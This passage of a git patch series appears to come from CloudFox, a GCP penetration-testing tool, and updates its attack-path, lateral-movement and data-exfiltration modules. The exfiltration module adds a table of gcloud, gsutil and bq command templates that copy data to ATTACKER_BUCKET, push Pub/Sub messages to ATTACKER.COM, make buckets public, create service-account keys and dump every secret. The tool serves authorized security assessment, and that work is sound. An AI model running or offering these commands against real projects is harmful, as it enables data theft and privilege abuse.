attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa) diff --git a/gcp/commands/serviceagents.go b/gcp/commands/serviceagents.go index 8f23c900..84dfd71a 100644 --- a/gcp/commands/serviceagents.go +++ b/gcp/commands/serviceagents.go @@ -39,8 +39,7 @@ Security Considerations: - Cloud Build SA is a common privilege escalation vector - Default compute SA often has Editor role -TIP: Use the --attack-paths flag to analyze privesc/exfil/lateral movement potential: - cloudfox gcp service-agents -p PROJECT_ID --attack-paths`, +TIP: Run foxmapper first to populate the Attack Paths column with privesc/exfil/lateral movement analysis.`, Run: runGCPServiceAgentsCommand, } @@ -457,7 +456,7 @@ func (m *ServiceAgentsModule) agentsToTableBody(agents []serviceagentsservice.Se } // Check attack paths for this service agent - attackPaths := "run --attack-paths" + attackPaths := "run foxmapper" if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, agent.Email) } diff --git a/gcp/services/crossProjectService/crossProjectService.go b/gcp/services/crossProjectService/crossProjectService.go index 54e6e411..03328150 100644 --- a/gcp/services/crossProjectService/crossProjectService.go +++ b/gcp/services/crossProjectService/crossProjectService.go @@ -356,36 +356,46 @@ func (s *CrossProjectService) analyzeBindingRisk(role, member string, isFromKnow func (s *CrossProjectService) generateExploitCommands(binding CrossProjectBinding) []string { var commands []string + // Build impersonation flag if service account + impersonateFlag := "" if binding.PrincipalType == "serviceAccount" { email := strings.TrimPrefix(binding.Principal, "serviceAccount:") + impersonateFlag = fmt.Sprintf(" --impersonate-service-account=%s", email) + } + + roleLower := strings.ToLower(binding.Role) + // Role-specific exploitation commands + if strings.Contains(roleLower, "owner") || strings.Contains(roleLower, "editor") { commands = append(commands, - fmt.Sprintf("# Impersonate SA from %s to access %s:", binding.SourceProject, binding.TargetProject), - fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", email), - fmt.Sprintf("# Then use token to access target project:"), - fmt.Sprintf("gcloud projects describe %s --impersonate-service-account=%s", binding.TargetProject, email), + fmt.Sprintf("gcloud compute instances list --project=%s%s", binding.TargetProject, impersonateFlag), + fmt.Sprintf("gcloud secrets list --project=%s%s", binding.TargetProject, impersonateFlag), + fmt.Sprintf("gsutil ls -p %s", binding.TargetProject), ) - } - - // Role-specific exploitation - if strings.Contains(binding.Role, "storage") { + } else if strings.Contains(roleLower, "storage") { commands = append(commands, - fmt.Sprintf("# List buckets in target project:"), fmt.Sprintf("gsutil ls -p %s", binding.TargetProject), ) - } - - if strings.Contains(binding.Role, "compute") { + } else if strings.Contains(roleLower, "compute") { commands = append(commands, - fmt.Sprintf("# List instances in target project:"), - fmt.Sprintf("gcloud compute instances list --project=%s", binding.TargetProject), + fmt.Sprintf("gcloud compute instances list --project=%s%s", binding.TargetProject, impersonateFlag), ) - } - - if strings.Contains(binding.Role, "secretmanager") { + } else if strings.Contains(roleLower, "secretmanager") { + commands = append(commands, + fmt.Sprintf("gcloud secrets list --project=%s%s", binding.TargetProject, impersonateFlag), + ) + } else if strings.Contains(roleLower, "bigquery") { + commands = append(commands, + fmt.Sprintf("bq ls --project_id=%s", binding.TargetProject), + fmt.Sprintf("bq query --project_id=%s 'SELECT * FROM INFORMATION_SCHEMA.TABLES'", binding.TargetProject), + ) + } else if strings.Contains(roleLower, "cloudsql") { + commands = append(commands, + fmt.Sprintf("gcloud sql instances list --project=%s%s", binding.TargetProject, impersonateFlag), + ) + } else if strings.Contains(roleLower, "serviceaccounttokencreator") || strings.Contains(roleLower, "serviceaccountkeyadmin") { commands = append(commands, - fmt.Sprintf("# List secrets in target project:"), - fmt.Sprintf("gcloud secrets list --project=%s", binding.TargetProject), + fmt.Sprintf("gcloud iam service-accounts list --project=%s%s", binding.TargetProject, impersonateFlag), ) } @@ -396,24 +406,39 @@ func (s *CrossProjectService) generateExploitCommands(binding CrossProjectBindin func (s *CrossProjectService) generateLateralMovementCommands(path LateralMovementPath) []string { var commands []string + // Build impersonation flag if service account + impersonateFlag := "" if strings.HasPrefix(path.SourcePrincipal, "serviceAccount:") { email := strings.TrimPrefix(path.SourcePrincipal, "serviceAccount:") - - commands = append(commands, - fmt.Sprintf("# Lateral movement from %s to %s via SA impersonation:", path.SourceProject, path.TargetProject), - fmt.Sprintf("# 1. Get access token for the cross-project SA:"), - fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", email), - fmt.Sprintf("# 2. Use the SA to access target project:"), - ) - - // Add role-specific commands - for _, role := range path.TargetRoles { - if strings.Contains(role, "owner") || strings.Contains(role, "editor") { - commands = append(commands, - fmt.Sprintf("# Full project access with %s:", role), - fmt.Sprintf("gcloud projects describe %s --impersonate-service-account=%s", path.TargetProject, email), - ) - } + impersonateFlag = fmt.Sprintf(" --impersonate-service-account=%s", email) + } + + // Add role-specific commands based on the most powerful role + for _, role := range path.TargetRoles { + roleLower := strings.ToLower(role) + if strings.Contains(roleLower, "owner") || strings.Contains(roleLower, "editor") { + commands = append(commands, + fmt.Sprintf("gcloud compute instances list --project=%s%s", path.TargetProject, impersonateFlag), + fmt.Sprintf("gcloud secrets list --project=%s%s", path.TargetProject, impersonateFlag), + fmt.Sprintf("gsutil ls -p %s", path.TargetProject), + ) + break // owner/editor covers everything, no need for more specific commands + } else if strings.Contains(roleLower, "storage") { + commands = append(commands, + fmt.Sprintf("gsutil ls -p %s", path.TargetProject), + ) + } else if strings.Contains(roleLower, "compute") { + commands = append(commands, + fmt.Sprintf("gcloud compute instances list --project=%s%s", path.TargetProject, impersonateFlag), + ) + } else if strings.Contains(roleLower, "secretmanager") { + commands = append(commands, + fmt.Sprintf("gcloud secrets list --project=%s%s", path.TargetProject, impersonateFlag), + ) + } else if strings.Contains(roleLower, "bigquery") { + commands = append(commands, + fmt.Sprintf("bq ls --project_id=%s", path.TargetProject), + ) } } diff --git a/internal/gcp/foxmapper_cache.go b/internal/gcp/foxmapper_cache.go index 1df84067..f6edac7d 100644 --- a/internal/gcp/foxmapper_cache.go +++ b/internal/gcp/foxmapper_cache.go @@ -3,7 +3,10 @@ package gcpinternal import ( "context" "fmt" + "os" + "path/filepath" "strings" + "time" foxmapperservice "github.com/BishopFox/cloudfox/gcp/services/foxmapperService" ) @@ -14,6 +17,8 @@ type FoxMapperCache struct { service *foxmapperservice.FoxMapperService populated bool identifier string + loadedPath string + dataAge time.Duration } // NewFoxMapperCache creates a new FoxMapper cache @@ -132,6 +137,26 @@ func (c *FoxMapperCache) GetIdentifier() string { return c.identifier } +// GetDataAge returns how old the FoxMapper data is +func (c *FoxMapperCache) GetDataAge() time.Duration { + return c.dataAge +} + +// GetDataAgeDays returns the age of FoxMapper data in days +func (c *FoxMapperCache) GetDataAgeDays() int { + return int(c.dataAge.Hours() / 24) +} + +// SetLoadedPath sets the path and calculates data age from file modification time +func (c *FoxMapperCache) SetLoadedPath(path string) { + c.loadedPath = path + // Try to get the modification time of the nodes.json file + nodesPath := filepath.Join(path, "graph", "nodes.json") + if info, err := os.Stat(nodesPath); err == nil { + c.dataAge = time.Since(info.ModTime()) + } +} + // HasPrivesc checks if a service account has privilege escalation potential func (c *FoxMapperCache) HasPrivesc(serviceAccount string) (bool, string) { if !c.populated { @@ -182,18 +207,25 @@ func TryLoadFoxMapper(orgID string, projectIDs []string) *FoxMapperCache { // Try org first - if it exists, it should contain all projects if orgID != "" { - if err := cache.LoadFromOrg(orgID); err == nil { - return cache + if path, err := foxmapperservice.FindFoxMapperData(orgID, true); err == nil { + if err := cache.LoadFromOrg(orgID); err == nil { + cache.SetLoadedPath(path) + return cache + } } } // No org-level graph - try to load and merge all project graphs loadedCount := 0 + var firstPath string for _, projectID := range projectIDs { if loadedCount == 0 { // First project - load normally - if err := cache.LoadFromProject(projectID); err == nil { - loadedCount++ + if path, err := foxmapperservice.FindFoxMapperData(projectID, false); err == nil { + if err := cache.LoadFromProject(projectID); err == nil { + firstPath = path + loadedCount++ + } } } else { // Subsequent projects - merge into existing graph @@ -213,6 +245,9 @@ func TryLoadFoxMapper(orgID string, projectIDs []string) *FoxMapperCache { } if loadedCount > 0 { + if firstPath != "" { + cache.SetLoadedPath(firstPath) + } return cache } diff --git a/internal/log.go b/internal/log.go index e473a458..853dbc00 100644 --- a/internal/log.go +++ b/internal/log.go @@ -67,6 +67,18 @@ func (l *Logger) SuccessM(text string, module string) { fmt.Printf(clearln+"[%s][%s] %s\n", green(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), green(module), text) } +func (l *Logger) Warn(text string) { + l.WarnM(text, "config") +} + +func (l *Logger) WarnM(text string, module string) { + var yellow = color.New(color.FgYellow).SprintFunc() + fmt.Printf(clearln+"[%s][%s] ⚠️ %s\n", yellow(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), yellow(module), text) + if l.txtLog != nil { + l.txtLog.Printf("[%s] WARNING: %s", module, text) + } +} + func (l *Logger) Error(text string) { l.ErrorM(text, "config") } From d021ea54de90b7e6e968de17315eee27be2e56f8 Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Thu, 19 Feb 2026 18:17:24 -0500 Subject: [PATCH 39/48] cleanup output, better streaming and file splitting --- cli/gcp.go | 22 +- gcp/commands/crossproject.go | 4 +- gcp/commands/dataexfiltration.go | 570 ++++++++++-- gcp/commands/domainwidedelegation.go | 21 - gcp/commands/endpoints.go | 221 +++-- gcp/commands/foxmapper.go | 124 ++- gcp/commands/functions.go | 3 +- gcp/commands/gke.go | 45 +- gcp/commands/hiddenadmins.go | 667 ++++++-------- gcp/commands/iam.go | 535 ++++++++--- gcp/commands/identityfederation.go | 618 +++++++++++++ gcp/commands/keys.go | 84 +- gcp/commands/lateralmovement.go | 415 ++++++--- gcp/commands/loadbalancers.go | 32 +- gcp/commands/organizations.go | 156 +++- gcp/commands/permissions.go | 484 +++++++--- gcp/commands/privesc.go | 839 +++++++++++++----- gcp/commands/serviceaccounts.go | 75 +- gcp/commands/serviceagents.go | 121 +-- gcp/commands/workloadidentity.go | 510 ++--------- .../crossProjectService.go | 107 ++- gcp/services/diagramService/diagramService.go | 212 +++-- .../foxmapperService/foxmapperService.go | 159 +++- .../organizationsService.go | 1 + .../serviceAgentsService.go | 27 +- globals/gcp.go | 1 + internal/gcp/foxmapper_cache.go | 57 ++ internal/gcp/org_cache.go | 127 ++- internal/output2.go | 492 ++++++++++ 29 files changed, 4813 insertions(+), 1916 deletions(-) mode change 100644 => 100755 cli/gcp.go mode change 100644 => 100755 gcp/commands/dataexfiltration.go mode change 100644 => 100755 gcp/commands/domainwidedelegation.go mode change 100644 => 100755 gcp/commands/endpoints.go mode change 100644 => 100755 gcp/commands/foxmapper.go mode change 100644 => 100755 gcp/commands/functions.go mode change 100644 => 100755 gcp/commands/gke.go mode change 100644 => 100755 gcp/commands/hiddenadmins.go mode change 100644 => 100755 gcp/commands/iam.go create mode 100644 gcp/commands/identityfederation.go mode change 100644 => 100755 gcp/commands/keys.go mode change 100644 => 100755 gcp/commands/lateralmovement.go mode change 100644 => 100755 gcp/commands/loadbalancers.go mode change 100644 => 100755 gcp/commands/organizations.go mode change 100644 => 100755 gcp/commands/permissions.go mode change 100644 => 100755 gcp/commands/privesc.go mode change 100644 => 100755 gcp/services/diagramService/diagramService.go mode change 100644 => 100755 gcp/services/foxmapperService/foxmapperService.go mode change 100644 => 100755 gcp/services/organizationsService/organizationsService.go mode change 100644 => 100755 internal/gcp/foxmapper_cache.go mode change 100644 => 100755 internal/gcp/org_cache.go mode change 100644 => 100755 internal/output2.go diff --git a/cli/gcp.go b/cli/gcp.go old mode 100644 new mode 100755 index 24f55bab..cfd9d3b7 --- a/cli/gcp.go +++ b/cli/gcp.go @@ -138,18 +138,22 @@ var ( totalNodes, adminNodes, nodesWithPrivesc := foxMapperCache.GetStats() ageDays := foxMapperCache.GetDataAgeDays() - if ageDays >= 7 { + if ageDays >= 30 { GCPLogger.WarnM(fmt.Sprintf("FoxMapper data is %d days old - consider running 'foxmapper gcp graph create' to refresh", ageDays), "gcp") + } else { + GCPLogger.InfoM(fmt.Sprintf("FoxMapper data is %d days old", ageDays), "gcp") } - GCPLogger.SuccessM(fmt.Sprintf("FoxMapper data loaded: %d principals, %d admins, %d with privesc (data age: %d days)", - totalNodes, adminNodes, nodesWithPrivesc, ageDays), "gcp") + GCPLogger.SuccessM(fmt.Sprintf("FoxMapper data loaded: %d principals, %d admins, %d with privesc", + totalNodes, adminNodes, nodesWithPrivesc), "gcp") } } // Always try to load org cache for cross-project analysis // Cache auto-refreshes after 24 hours - orgCache := loadOrPopulateOrgCache(account, GCPRefreshCache) + // Force refresh when running the organizations command to ensure fresh data + refreshCache := GCPRefreshCache || cmd.Name() == "organizations" + orgCache := loadOrPopulateOrgCache(account, refreshCache) if orgCache != nil && orgCache.IsPopulated() { ctx = gcpinternal.SetOrgCacheInContext(ctx, orgCache) } @@ -372,6 +376,8 @@ func enumerateAndCacheOrgs(account string) *gcpinternal.OrgCache { ID: org.Name[len("organizations/"):], // Strip prefix Name: org.Name, DisplayName: org.DisplayName, + DirectoryID: org.DirectoryID, + State: org.State, }) } } @@ -385,6 +391,7 @@ func enumerateAndCacheOrgs(account string) *gcpinternal.OrgCache { Name: folder.Name, DisplayName: folder.DisplayName, Parent: folder.Parent, + State: folder.State, }) } } @@ -393,8 +400,14 @@ func enumerateAndCacheOrgs(account string) *gcpinternal.OrgCache { projects, err := orgsSvc.SearchProjects("") if err == nil { for _, project := range projects { + // Extract project number from Name (format: "projects/123456789") + projectNumber := "" + if strings.HasPrefix(project.Name, "projects/") { + projectNumber = strings.TrimPrefix(project.Name, "projects/") + } cache.AddProject(gcpinternal.CachedProject{ ID: project.ProjectID, + Number: projectNumber, Name: project.Name, DisplayName: project.DisplayName, Parent: project.Parent, @@ -513,6 +526,7 @@ func init() { commands.GCPKeysCommand, commands.GCPEndpointsCommand, commands.GCPWorkloadIdentityCommand, + commands.GCPIdentityFederationCommand, commands.GCPOrganizationsCommand, commands.GCPCloudBuildCommand, commands.GCPMemorystoreCommand, diff --git a/gcp/commands/crossproject.go b/gcp/commands/crossproject.go index dbaab161..8782ab41 100644 --- a/gcp/commands/crossproject.go +++ b/gcp/commands/crossproject.go @@ -140,7 +140,7 @@ func (m *CrossProjectModule) Execute(ctx context.Context, logger internal.Logger svc := crossprojectservice.New() // Analyze cross-project bindings - bindings, err := svc.AnalyzeCrossProjectAccess(m.ProjectIDs) + bindings, err := svc.AnalyzeCrossProjectAccess(m.ProjectIDs, m.OrgCache) if err != nil { m.CommandCounter.Error++ gcpinternal.HandleGCPError(err, logger, globals.GCP_CROSSPROJECT_MODULE_NAME, @@ -160,7 +160,7 @@ func (m *CrossProjectModule) Execute(ctx context.Context, logger internal.Logger } // Find lateral movement paths - paths, err := svc.FindLateralMovementPaths(m.ProjectIDs) + paths, err := svc.FindLateralMovementPaths(m.ProjectIDs, m.OrgCache) if err != nil { m.CommandCounter.Error++ gcpinternal.HandleGCPError(err, logger, globals.GCP_CROSSPROJECT_MODULE_NAME, diff --git a/gcp/commands/dataexfiltration.go b/gcp/commands/dataexfiltration.go old mode 100644 new mode 100755 index ad0a8f4a..2b1eb7dd --- a/gcp/commands/dataexfiltration.go +++ b/gcp/commands/dataexfiltration.go @@ -119,6 +119,7 @@ type DataExfiltrationModule struct { vpcscProtectedProj map[string]bool // Projects protected by VPC-SC orgPolicyProtection map[string]*OrgPolicyProtection // Org policy protections per project FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper cache for unified data access + OrgCache *gcpinternal.OrgCache // OrgCache for ancestry lookups } // ------------------------------ @@ -173,9 +174,69 @@ func (m *DataExfiltrationModule) getAllPublicExports() []PublicExport { return all } +// filterFindingsByProjects filters FoxMapper findings to only include principals +// from the specified projects (via -p or -l flags) OR principals without a clear project +// (users, groups, compute default SAs, etc.) +func (m *DataExfiltrationModule) filterFindingsByProjects(findings []foxmapperservice.DataExfilFinding) []foxmapperservice.DataExfilFinding { + // Build a set of specified project IDs for fast lookup + specifiedProjects := make(map[string]bool) + for _, projectID := range m.ProjectIDs { + specifiedProjects[projectID] = true + } + + var filtered []foxmapperservice.DataExfilFinding + + for _, finding := range findings { + // Filter principals to only those from specified projects OR without a clear project + var filteredPrincipals []foxmapperservice.PrincipalAccess + for _, p := range finding.Principals { + principalProject := extractProjectFromPrincipal(p.Principal, m.OrgCache) + // Include if: + // 1. Principal's project is in our specified list, OR + // 2. Principal has no clear project (users, groups, compute default SAs) + if specifiedProjects[principalProject] || principalProject == "" { + filteredPrincipals = append(filteredPrincipals, p) + } + } + + // Only include the finding if it has matching principals + if len(filteredPrincipals) > 0 { + filteredFinding := finding + filteredFinding.Principals = filteredPrincipals + filtered = append(filtered, filteredFinding) + } + } + + return filtered +} + +// countFindingsByProject returns a count of findings per project for debugging +func (m *DataExfiltrationModule) countFindingsByProject() map[string]int { + counts := make(map[string]int) + for _, f := range m.FoxMapperFindings { + for _, p := range f.Principals { + proj := extractProjectFromPrincipal(p.Principal, m.OrgCache) + if proj == "" { + proj = "(unknown)" + } + counts[proj]++ + } + } + return counts +} + func (m *DataExfiltrationModule) Execute(ctx context.Context, logger internal.Logger) { logger.InfoM("Identifying data exfiltration paths and potential vectors...", GCP_DATAEXFILTRATION_MODULE_NAME) + // Load OrgCache for ancestry lookups (needed for per-project filtering) + m.OrgCache = gcpinternal.GetOrgCacheFromContext(ctx) + if m.OrgCache == nil || !m.OrgCache.IsPopulated() { + diskCache, _, err := gcpinternal.LoadOrgCacheFromFile(m.OutputDirectory, m.Account) + if err == nil && diskCache != nil && diskCache.IsPopulated() { + m.OrgCache = diskCache + } + } + // Get FoxMapper cache from context or try to load it m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) if m.FoxMapperCache == nil || !m.FoxMapperCache.IsPopulated() { @@ -200,9 +261,21 @@ func (m *DataExfiltrationModule) Execute(ctx context.Context, logger internal.Lo if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { logger.InfoM("Analyzing permission-based exfiltration paths using FoxMapper...", GCP_DATAEXFILTRATION_MODULE_NAME) svc := m.FoxMapperCache.GetService() - m.FoxMapperFindings = svc.AnalyzeDataExfil("") + allFindings := svc.AnalyzeDataExfil("") + + // Filter findings to only include principals from specified projects + m.FoxMapperFindings = m.filterFindingsByProjects(allFindings) + if len(m.FoxMapperFindings) > 0 { logger.InfoM(fmt.Sprintf("Found %d permission-based exfiltration techniques with access", len(m.FoxMapperFindings)), GCP_DATAEXFILTRATION_MODULE_NAME) + + // Log findings per project for debugging + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + counts := m.countFindingsByProject() + for proj, count := range counts { + logger.InfoM(fmt.Sprintf(" - %s: %d principals", proj, count), GCP_DATAEXFILTRATION_MODULE_NAME) + } + } } } else { logger.InfoM("No FoxMapper data found - skipping permission-based analysis. Run 'foxmapper gcp graph create' for full analysis.", GCP_DATAEXFILTRATION_MODULE_NAME) @@ -370,48 +443,215 @@ func (m *DataExfiltrationModule) initializeLootForProject(projectID string) { } } -func (m *DataExfiltrationModule) generatePlaybook() *internal.LootFile { +// getExploitCommand returns specific exploitation commands for a permission +func getExploitCommand(permission, principal, project string) string { + // Map permissions to specific gcloud/gsutil commands + commands := map[string]string{ + // Storage + "storage.objects.get": "gsutil cp gs://BUCKET/OBJECT ./\ngcloud storage cp gs://BUCKET/OBJECT ./", + "storage.objects.list": "gsutil ls -r gs://BUCKET/\ngcloud storage ls --recursive gs://BUCKET/", + "storage.buckets.setIamPolicy": "gsutil iam ch allUsers:objectViewer gs://BUCKET\n# Or grant yourself access:\ngsutil iam ch user:ATTACKER@EMAIL:objectAdmin gs://BUCKET", + "storage.hmacKeys.create": "gsutil hmac create SERVICE_ACCOUNT_EMAIL", + + // IAM / Service Account Impersonation + "iam.serviceAccounts.signBlob": "gcloud iam service-accounts sign-blob --iam-account=TARGET_SA input.txt output.sig", + "iam.serviceAccountKeys.create": "gcloud iam service-accounts keys create key.json --iam-account=TARGET_SA", + "iam.serviceAccounts.getAccessToken": "gcloud auth print-access-token --impersonate-service-account=TARGET_SA", + + // Storage Transfer + "storagetransfer.jobs.create": "# Create transfer job to exfil bucket to external destination\ngcloud transfer jobs create gs://SOURCE_BUCKET gs://ATTACKER_BUCKET --name=exfil-job", + "storagetransfer.jobs.update": "# Update existing transfer job destination\ngcloud transfer jobs update JOB_NAME --destination=gs://ATTACKER_BUCKET", + "storagetransfer.jobs.run": "gcloud transfer jobs run JOB_NAME", + + // BigQuery + "bigquery.tables.export": "bq extract --destination_format=CSV PROJECT:DATASET.TABLE gs://BUCKET/export.csv", + "bigquery.tables.getData": "bq query --use_legacy_sql=false 'SELECT * FROM `PROJECT.DATASET.TABLE` LIMIT 1000'", + "bigquery.jobs.create": "bq query --use_legacy_sql=false 'SELECT * FROM `PROJECT.DATASET.TABLE`'\nbq extract PROJECT:DATASET.TABLE gs://BUCKET/export.csv", + "bigquery.datasets.setIamPolicy": "bq add-iam-policy-binding --member=user:ATTACKER@EMAIL --role=roles/bigquery.dataViewer PROJECT:DATASET", + + // Cloud SQL + "cloudsql.instances.export": "gcloud sql export sql INSTANCE gs://BUCKET/export.sql --database=DATABASE", + "cloudsql.backupRuns.create": "gcloud sql backups create --instance=INSTANCE", + "cloudsql.instances.connect": "gcloud sql connect INSTANCE --user=USER --database=DATABASE", + "cloudsql.users.create": "gcloud sql users create ATTACKER --instance=INSTANCE --password=PASSWORD", + + // Spanner + "spanner.databases.export": "gcloud spanner databases export DATABASE --instance=INSTANCE --destination-uri=gs://BUCKET/spanner-export/", + "spanner.databases.read": "gcloud spanner databases execute-sql DATABASE --instance=INSTANCE --sql='SELECT * FROM TABLE_NAME'", + "spanner.backups.create": "gcloud spanner backups create BACKUP --instance=INSTANCE --database=DATABASE --retention-period=7d", + + // Datastore / Firestore + "datastore.databases.export": "gcloud datastore export gs://BUCKET/datastore-export/ --namespaces='(default)'", + "datastore.entities.get": "gcloud datastore export gs://BUCKET/datastore-export/", + + // Bigtable + "bigtable.tables.readRows": "cbt -project=PROJECT -instance=INSTANCE read TABLE", + "bigtable.backups.create": "cbt -project=PROJECT -instance=INSTANCE createbackup CLUSTER BACKUP TABLE", + + // Pub/Sub + "pubsub.subscriptions.create": "gcloud pubsub subscriptions create ATTACKER_SUB --topic=TOPIC\ngcloud pubsub subscriptions pull ATTACKER_SUB --auto-ack --limit=100", + "pubsub.subscriptions.consume": "gcloud pubsub subscriptions pull SUBSCRIPTION --auto-ack --limit=100", + "pubsub.subscriptions.update": "gcloud pubsub subscriptions update SUBSCRIPTION --push-endpoint=https://ATTACKER.COM/webhook", + + // Compute + "compute.snapshots.create": "gcloud compute snapshots create SNAPSHOT_NAME --source-disk=DISK_NAME --source-disk-zone=ZONE", + "compute.disks.createSnapshot": "gcloud compute disks snapshot DISK_NAME --zone=ZONE --snapshot-names=SNAPSHOT_NAME", + "compute.images.create": "gcloud compute images create IMAGE_NAME --source-disk=DISK_NAME --source-disk-zone=ZONE", + "compute.machineImages.create": "gcloud compute machine-images create IMAGE_NAME --source-instance=INSTANCE --source-instance-zone=ZONE", + "compute.images.setIamPolicy": "gcloud compute images add-iam-policy-binding IMAGE --member=user:ATTACKER@EMAIL --role=roles/compute.imageUser", + "compute.snapshots.setIamPolicy": "gcloud compute snapshots add-iam-policy-binding SNAPSHOT --member=user:ATTACKER@EMAIL --role=roles/compute.storageAdmin", + + // Logging + "logging.sinks.create": "gcloud logging sinks create SINK_NAME storage.googleapis.com/ATTACKER_BUCKET --log-filter='resource.type=\"gce_instance\"'", + "logging.sinks.update": "gcloud logging sinks update SINK_NAME --destination=storage.googleapis.com/ATTACKER_BUCKET", + "logging.logEntries.list": "gcloud logging read 'resource.type=\"gce_instance\"' --limit=1000 --format=json > logs.json", + + // Secret Manager + "secretmanager.versions.access": "gcloud secrets versions access latest --secret=SECRET_NAME", + "secretmanager.secrets.list": "gcloud secrets list --format='value(name)'\n# Then access each secret:\nfor secret in $(gcloud secrets list --format='value(name)'); do gcloud secrets versions access latest --secret=$secret; done", + + // KMS + "cloudkms.cryptoKeyVersions.useToDecrypt": "gcloud kms decrypt --key=KEY_NAME --keyring=KEYRING --location=LOCATION --ciphertext-file=encrypted.bin --plaintext-file=decrypted.txt", + "cloudkms.cryptoKeys.setIamPolicy": "gcloud kms keys add-iam-policy-binding KEY_NAME --keyring=KEYRING --location=LOCATION --member=user:ATTACKER@EMAIL --role=roles/cloudkms.cryptoKeyDecrypter", + + // Artifact Registry + "artifactregistry.repositories.downloadArtifacts": "gcloud artifacts docker images list LOCATION-docker.pkg.dev/PROJECT/REPO\ndocker pull LOCATION-docker.pkg.dev/PROJECT/REPO/IMAGE:TAG", + "artifactregistry.repositories.setIamPolicy": "gcloud artifacts repositories add-iam-policy-binding REPO --location=LOCATION --member=user:ATTACKER@EMAIL --role=roles/artifactregistry.reader", + + // Cloud Functions + "cloudfunctions.functions.get": "gcloud functions describe FUNCTION_NAME --region=REGION", + "cloudfunctions.functions.sourceCodeGet": "gcloud functions describe FUNCTION_NAME --region=REGION --format='value(sourceArchiveUrl)'\ngsutil cp SOURCE_URL ./function-source.zip", + + // Cloud Run + "run.services.get": "gcloud run services describe SERVICE --region=REGION --format=yaml", + + // Dataproc + "dataproc.jobs.create": "gcloud dataproc jobs submit spark --cluster=CLUSTER --region=REGION --class=org.example.ExfilJob --jars=gs://ATTACKER_BUCKET/exfil.jar", + + // Dataflow + "dataflow.jobs.create": "gcloud dataflow jobs run exfil-job --gcs-location=gs://dataflow-templates/latest/GCS_to_GCS --region=REGION --parameters inputDirectory=gs://SOURCE_BUCKET,outputDirectory=gs://ATTACKER_BUCKET", + + // Redis + "redis.instances.export": "gcloud redis instances export gs://BUCKET/redis-export.rdb --instance=INSTANCE --region=REGION", + + // AlloyDB + "alloydb.backups.create": "gcloud alloydb backups create BACKUP --cluster=CLUSTER --region=REGION", + + // Source Repos + "source.repos.get": "gcloud source repos clone REPO_NAME\ncd REPO_NAME && git log --all", + + // Healthcare API + "healthcare.fhirResources.get": "curl -H \"Authorization: Bearer $(gcloud auth print-access-token)\" \"https://healthcare.googleapis.com/v1/projects/PROJECT/locations/LOCATION/datasets/DATASET/fhirStores/STORE/fhir/Patient\"", + "healthcare.dicomStores.dicomWebRetrieve": "curl -H \"Authorization: Bearer $(gcloud auth print-access-token)\" \"https://healthcare.googleapis.com/v1/projects/PROJECT/locations/LOCATION/datasets/DATASET/dicomStores/STORE/dicomWeb/studies\"", + "healthcare.datasets.export": "gcloud healthcare datasets export DATASET --location=LOCATION --destination-uri=gs://BUCKET/healthcare-export/", + } + + cmd, ok := commands[permission] + if !ok { + return fmt.Sprintf("# No specific command for %s - check gcloud documentation", permission) + } + + // Replace placeholders with actual values where possible + if project != "" && project != "-" { + cmd = strings.ReplaceAll(cmd, "PROJECT", project) + } + + return cmd +} + +// generatePlaybookForProject generates a loot file specific to a project +// It includes SAs from that project + users/groups (which apply to all projects) +func (m *DataExfiltrationModule) generatePlaybookForProject(projectID string) *internal.LootFile { var sb strings.Builder - sb.WriteString("# GCP Data Exfiltration Playbook\n") + sb.WriteString("# GCP Data Exfiltration Commands\n") + sb.WriteString(fmt.Sprintf("# Project: %s\n", projectID)) sb.WriteString("# Generated by CloudFox\n\n") - // Actual misconfigurations - allPaths := m.getAllExfiltrationPaths() - if len(allPaths) > 0 { + // Actual misconfigurations for this project + paths := m.ProjectExfiltrationPaths[projectID] + if len(paths) > 0 { sb.WriteString("## Actual Misconfigurations\n\n") - for _, path := range allPaths { + for _, path := range paths { sb.WriteString(fmt.Sprintf("### %s: %s\n", path.PathType, path.ResourceName)) - sb.WriteString(fmt.Sprintf("- Project: %s\n", path.ProjectID)) - sb.WriteString(fmt.Sprintf("- Risk Level: %s\n", path.RiskLevel)) - sb.WriteString(fmt.Sprintf("- Description: %s\n", path.Description)) - sb.WriteString(fmt.Sprintf("- Destination: %s\n\n", path.Destination)) + sb.WriteString(fmt.Sprintf("# Description: %s\n", path.Description)) if path.ExploitCommand != "" { - sb.WriteString("```bash\n") sb.WriteString(path.ExploitCommand) - sb.WriteString("\n```\n\n") + sb.WriteString("\n\n") } } } - // Permission-based findings from FoxMapper + // Permission-based findings from FoxMapper - filter to this project's principals + users/groups if len(m.FoxMapperFindings) > 0 { - sb.WriteString("## Permission-Based Exfiltration Techniques\n\n") + hasFindings := false + for _, finding := range m.FoxMapperFindings { - sb.WriteString(fmt.Sprintf("### %s (%s)\n", finding.Technique, finding.Service)) - sb.WriteString(fmt.Sprintf("- Permission: %s\n", finding.Permission)) - sb.WriteString(fmt.Sprintf("- Description: %s\n", finding.Description)) - sb.WriteString(fmt.Sprintf("- Principals with access: %d\n\n", len(finding.Principals))) - if finding.Exploitation != "" { - sb.WriteString("```bash\n") - sb.WriteString(finding.Exploitation) - sb.WriteString("\n```\n\n") + var relevantPrincipals []foxmapperservice.PrincipalAccess + + for _, p := range finding.Principals { + principalProject := extractProjectFromPrincipal(p.Principal, m.OrgCache) + // Include if: SA from this project OR user/group (no project) + if principalProject == projectID || principalProject == "" { + relevantPrincipals = append(relevantPrincipals, p) + } + } + + if len(relevantPrincipals) == 0 { + continue + } + + if !hasFindings { + sb.WriteString("## Permission-Based Exfiltration Commands\n\n") + hasFindings = true + } + + sb.WriteString(fmt.Sprintf("### %s (%s)\n", finding.Permission, finding.Service)) + sb.WriteString(fmt.Sprintf("# %s\n\n", finding.Description)) + + for _, p := range relevantPrincipals { + project := extractProjectFromPrincipal(p.Principal, m.OrgCache) + if project == "" { + project = projectID // Use the target project for users/groups + } + + principalType := p.MemberType + if principalType == "" { + if p.IsServiceAccount { + principalType = 